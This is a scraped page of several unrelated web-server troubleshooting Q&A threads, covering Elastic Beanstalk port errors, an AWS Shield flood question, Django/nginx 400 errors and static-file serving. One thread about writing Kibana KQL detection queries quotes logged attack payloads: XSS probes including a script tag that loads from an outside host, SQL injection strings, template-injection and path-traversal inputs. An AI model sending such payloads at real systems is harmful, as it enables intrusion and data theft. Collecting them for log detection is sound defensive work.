I have tried to get this project deployed to AWS Elastic Beanstalk: https://github.com/coralproject/talk The dockerfile exposes port 5000 and I have defined environment variables also all using port 5000.
When I run the project locally with the recommended docker-compose file (https://coralproject.github.io/talk/installation-from-docker/#installing) everything works fine locally.
But when I deploy the app to Beanstalk, the html page is served and loads fine, however other files that are referenced locally such as my bundle.js and favicon files return a 502.
What am I missing?
Logs that may be relevant:
/var/log/eb-activity.log
cat: /var/app/current/Dockerrun.aws.json: No such file or directory
8c17e6ddb0f842e592940a3aa67d0f39ec8702eb4ad6c3f9b876fc33b7f02ddc
[2018-02-11T08:29:26.836Z] INFO [24507] - [Application update
app-5d978-180211_092600#12/AppDeployStage1/AppDeployEnactHook/01flip.sh]
: Starting activity... [2018-02-11T08:29:28.428Z] INFO [24507] -
[Application update
app-5d978-180211_092600#12/AppDeployStage1/AppDeployEnactHook/01flip.sh]
: Completed activity. Result: nginx: [warn] duplicate MIME type
"text/html" in
/etc/nginx/sites-enabled/elasticbeanstalk-nginx-docker-proxy.conf:11
Stopping nginx: [ OK ] Starting nginx: nginx: [warn] duplicate
MIME type "text/html" in
/etc/nginx/sites-enabled/elasticbeanstalk-nginx-docker-proxy.conf:11
[ OK ] cat: /var/app/current/Dockerrun.aws.json: No such file or
directory /opt/elasticbeanstalk/hooks/common.sh: line 95: [: 1:
unary operator expected iptables: Saving firewall rules to
/etc/sysconfig/iptables: [ OK ]
The nginx access log only shows the html requests not the other files
/var/log/nginx/access.log
95.90.245.122 - - [11/Feb/2018:22:43:00 +0000] "GET / HTTP/1.1" 302 72 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
95.90.245.122 - - [11/Feb/2018:22:43:00 +0000] "GET /admin/install HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132
Safari/537.36"
95.90.245.122 - - [11/Feb/2018:22:45:57 +0000] "GET /admin/install HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132
Safari/537.36"
95.90.245.122 - - [11/Feb/2018:22:46:04 +0000] "GET / HTTP/1.1" 302 72 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
95.90.245.122 - - [11/Feb/2018:22:46:04 +0000] "GET /admin/install HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132
Safari/537.36"
I see this when I access the page:
install:45 GET
https://talk-now.us-east-1.elasticbeanstalk.com:5000/static/coral-admin/bundle.js
net::ERR_CONNECTION_REFUSED :5000/public/img/favicon-32x32.png:1 GET
https://talk-now.us-east-1.elasticbeanstalk.com:5000/public/img/favicon-32x32.png
net::ERR_CONNECTION_REFUSED :5000/public/img/favicon-16x16.png:1 GET
https://talk-now.us-east-1.elasticbeanstalk.com:5000/public/img/favicon-16x16.png
net::ERR_CONNECTION_REFUSED :5000/public/img/favicon-96x96.png:1 GET
https://talk-now.us-east-1.elasticbeanstalk.com:5000/public/img/favicon-96x96.png
net::ERR_CONNECTION_REFUSED
The problem is that you are missing a Dockerrun.aws.json file at the root level of your repository. This file is necessary for Beanstalk to determine how to execute the set of containers in your project.
Also note that the format of the sections in this file is similar to that of Amazon ECS Task definitions
Related
My website under Route 53 and ALB was flooded once on 12 May but seemed AWS Shield Standard version (free) didn't do anything to prevent?
Showing 1000 of 9,828,102 records matched:
2022-05-12T08:01:25.024+08:00 51.15.0.133 - - [12/May/2022:00:01:24 +0000] "GET http://www.1980mu.com:89/ HTTP/1.1" 200 8216 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-"
2022-05-12T08:01:25.024+08:00 51.15.0.133 - - [12/May/2022:00:01:24 +0000] "GET http://www.1980mu.com:89/ HTTP/1.1" 200 8216 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
2022-05-12T08:01:25.024+08:00 51.15.0.133 - - [12/May/2022:00:01:24 +0000] "GET http://www.1980mu.com:89/ HTTP/1.1" 200 8216 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-"
2022-05-12T08:01:25.024+08:00 51.15.0.133 - - [12/May/2022:00:01:24 +0000] "GET http://www.1980mu.com:89/ HTTP/1.1" 200 8216 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3599.0 Safari/537.36" "-"
2022-05-12T08:01:25.024+08:00 51.15.0.133 - - [12/May/2022:00:01:24 +0000] "GET http://www.1980mu.com:89/ HTTP/1.1" 200 8216 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; rv:11.0) like Gecko" "-"
enter image description here
Shield standard only protects Layer 3 and 4 of your application network stack - so its expected it would allow valid web traffic through. You would need to use Shield Advanced or WAF to gain greater control and Cloud Front to provide a caching layer (all paid services) to better protect your instances.
My advice is to follow the principle of least privilege at each layer in terms of firewall ports open and what hostnames you allow. You can use rate limiting via WAF to avoid getting flooded, and using CloudFront to intercept requests and return cached responses where possible to reduce load on your instances.
Recently I'm experimenting with logstach and Kibana on top of elastic over (web-)server logs. I tried to extract some attack signature like XSS & SQL injection like the following examples when logs contain < $ ' " ! .\ %22, and so on:
<script>foo</script>
<script>document.cookie=%22testkzcp=XXX;%22</script>
<meta%20http-equiv=Set-Cookie%20content=%22testvpmi=XXXX%22>
${XXXXXXXXXX+5}.action
'.print(md5(XXXXX)).'
${#print(md5(XXXXX))}\
";print(md5(XXXXX));$a="
!(()&&!|*|*|
.\.\.\.\.\.\.\.\.\.\/windows/win.ini
The following is the common error I get when using"((", ".\", "OR" or "$" and so on using KQL:
KQLSyntaxError: Expected ":", "<", "<=", ">", ">=", AND, OR, end of input, whitespace but ")" found.
I checked The Kibana Query Language (KQL) and tried to use * as wildcard_queries beside of interesting term "</script>" or "%22</script>" through my desired timestamp but it was unsuccessful. I also checked Escaping special characters in elasticsearch.
So The question is, What is the best practice for using KQL to filter/search desired string-based attack signature over logs. Please give an example for the above-mentioned attack signatures.
Edit1: I found the post that says it's possible to solve this problem using Regex in KQL as well as some workaround here & here, So I'm also interested in finding Regex-based solution to find the afore-mentioned pattern in KQL.
Example web requests within the above-mentioned patterns:
[21/Jan/2021:02:02:23 +0000] XX.XXX.XXX.X "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42109 "'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=074623&r=74172-18&h=74172-7bf88-2&"></script>" "'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=074623&r=74172-18&h=74172-7bf88-2&"></script>" - - TLSv1.2 -,-,-
[19/Jan/2021:23:02:37 +0000] XXX.XXX.XXX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42109 "-1" OR 2+190-190-1=0+0+0+1 --" "-1" OR 2+190-190-1=0+0+0+1 --" - - TLSv1.2 -,-,-
[10/Jan/2021:01:11:02 +0000] XXX.XXX.XX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42133 "${#print(md5(31337))}" "${#print(md5(31337))}" - - TLSv1.2 -,-,-
[18/Jan/2022:09:13:00 +0000] XXX.XXX.XX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42133 ")))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))" ")))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))" - - TLSv1.2 -,-,-
We display some web pages in our MFC application. We use an ordinary IWebBrowser2 object, and we just do a Navigate2() call to display a certain URL.
But often, the page is not displayed. We just get a blank (white) control in our dialog. If we right click and choose "Refresh", the page is displayed correctly. This doesn't happend all the time - sometimes the page is displayed as it should without Refresh.
And everything seems to be OK on the server. This is the log:
--- we do a Navigate2()
172.16.0.119 - - [24/Apr/2017:15:05:10 +0200] "GET /home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml HTTP/1.1" 200 31095 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:10 +0200] "GET /xslt/KVE865001.xslt HTTP/1.1" 200 10742 "http://172.29.8.80/xslt/KVE865001.xslt" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
--- we do a Refresh
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml HTTP/1.1" 304 - "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /xslt/KVE865001.xslt HTTP/1.1" 304 - "http://172.29.8.80/xslt/KVE865001.xslt" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /css/styles01.css HTTP/1.1" 200 905 "http://172.29.8.80/home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /images/topleft01.gif HTTP/1.1" 200 207 "http://172.29.8.80/home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /images/topright01.gif HTTP/1.1" 200 211 "http://172.29.8.80/home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /images/bottomleft01.gif HTTP/1.1" 200 209 "http://172.29.8.80/home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /images/bottomright01.gif HTTP/1.1" 200 208 "http://172.29.8.80/home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
First, only the XML and the XSLT files are fetched from the server - and the control is blank. When we Refresh, those files are fetched again. They don't need to be sent, though (status 304), so they were fetched correctly the first time. But the second time, the web browser control moves on, and also gets the CSS file and a couple of GIF:s. And the page is displayed.
Does anybody knows what could cause this "half hearted" loading of the web page the first time? Is there some "IWebBrowser2 quirk" we should know about, or something we could do differently in our application? We haven't been able to solve this - I would be VERY grateful for some help!
/Anders from Sweden
I have problem with setting https://github.com/lqez/django-summernote . I followed steps in configuration part and it works great with django runserver - I have summernote in admin page etc. But when I add it to public server, it loads just sometimes.
When I'm pressing F5 in admin page, I can see that sometimes summernote loads and sometimes it doesnt. In nginx-error.log I have this message, when it is not loaded:
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /admin/django_summernote/attachment/ HTTP/1.1" 200 3347 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
and I get something like:
Not Found
The requested URL /admin/django_summernote/attachment/ was not found on this server.
and this when it is loaded:
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/css/base.css HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/css/changelists.css HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/js/core.js HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/js/jquery.min.js HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/js/jquery.init.js HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/js/actions.min.js HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /admin/jsi18n/ HTTP/1.1" 200 2384 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/img/icon_searchbox.png HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
I'm really confused, because it is properly installed and works well with django runserver. And when it is properly loaded, it works just fine. My static dir also has this files:
`-- django_summernote
|-- SOURCE
|-- django_summernote.css
|-- jquery.fileupload.js
|-- jquery.iframe-transport.js
|-- jquery.ui.widget.js
|-- lang
|-- summernote.css
`-- summernote.min.js
Thanks
It must be an debug mode when you're running django project with runserver.
If django runs in debug mode, serving static files via urls.py works fine. But this doesn't work as expected on debug=False.
You have to serve static files via web servers (like nginx) on production phase. Please refer https://docs.djangoproject.com/en/dev/howto/static-files/
I have followed this tutorial: http://blog.wercker.com/2013/11/25/django-16-part3.html and I am just trying to make it work locally with Vagrant for now. I am not trying to use Wercker.
After everything is installed, I try to access the website but I get a Bad Request (400) error every time. I do not know if that is due to a problem in nginx or in gunicorn.
They both have a log entry so at least I know that the request goes all the way through gunicorn and is not stopped at the nginx level.
Where is the problem located? Gunicorn? nginx?
Here are the logs of gunicorn and nginx.
I see that the favicon is missing but that only should not stop the page from being displayed right?
Gunicorn:
>>> cat /var/local/sites/hellocities/run/gunicorn.error.log
10.0.0.1 - - [28/Jan/2014:07:05:16] "GET / HTTP/1.0" 400 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"
10.0.0.1 - - [28/Jan/2014:07:09:43] "GET / HTTP/1.0" 400 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"
Nginx:
>>> cat /var/log/nginx/hellocities-access.log
10.0.0.1 - - [28/Jan/2014:07:05:16 +0000] "GET / HTTP/1.1" 400 37 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"
10.0.0.1 - - [28/Jan/2014:07:05:20 +0000] "GET /favicon.ico HTTP/1.1" 404 200 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"
10.0.0.1 - - [28/Jan/2014:07:09:43 +0000] "GET / HTTP/1.1" 400 37 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"
10.0.0.1 - - [28/Jan/2014:07:09:44 +0000] "GET /favicon.ico HTTP/1.1" 404 200 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"
>>> cat /var/log/nginx/hellocities-error.log
2014/01/28 07:05:20 [error] 13886#0: *1 open() "/var/local/sites/hellocities/static/favicon.ico" failed (2: No such file or directory), client: 10.0.0.1, server: _, request: "GET /favicon.ico HTTP/1.1", host: "10.0.0.200"
2014/01/28 07:09:44 [error] 13886#0: *3 open() "/var/local/sites/hellocities/static/favicon.ico" failed (2: No such file or directory), client: 10.0.0.1, server: _, request: "GET /favicon.ico HTTP/1.1", host: "10.0.0.200"
I had the same problem and adding ALLOWED_HOSTS = ("yourdomain.com",) to settings fixed it.
UPDATE: there few other possibilities:
Nginx (or whatever web server you use) doesn't pass the $host variable to the app
Host contains underscores
See details: https://blog.anvileight.com/posts/how-to-fix-bad-request-400-in-django/
As I was having the same issue (400 error code when trying to share with vagrant share), I stumble upon this question. The answer and comments are right, as the obvious solution is to set ALLOWED_HOSTS list, but I was already setting it correctly (I thought).
I can't speak for nginx as I'm running this on apache2, but here's what solved the issue:
Take a look at the ALLOWED_HOSTS doc to find what's best for your case.
With vagrant, you might find it useful to accept all the vagrantshare.com subdomain, so just add '.vagrantshare.com' (notice the dot) to the ALLOWED_HOSTS list.
Not sure if it is really necessary, but I changed the modified date of the wsgi.py file
touch wsgi.py
As I'm using apache2, I needed to restart the service.
sudo service apache2 restart
And then it worked.
I ran into this issue. It was because I forgot to add the proxy_set_header settings in the nginx config:
proxy_set_header Host $http_host;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
So Django didn't see the original hostname that was requested, so it didn't match with what was in ALLOWED_HOSTS. Then it gave back the 400 response.
After adding this to my nginx config (at the spot where you do the proxy_pass to Gunicorn) and then restarting nginx, it worked.
More info: https://docs.gunicorn.org/en/stable/deploy.html#nginx-configuration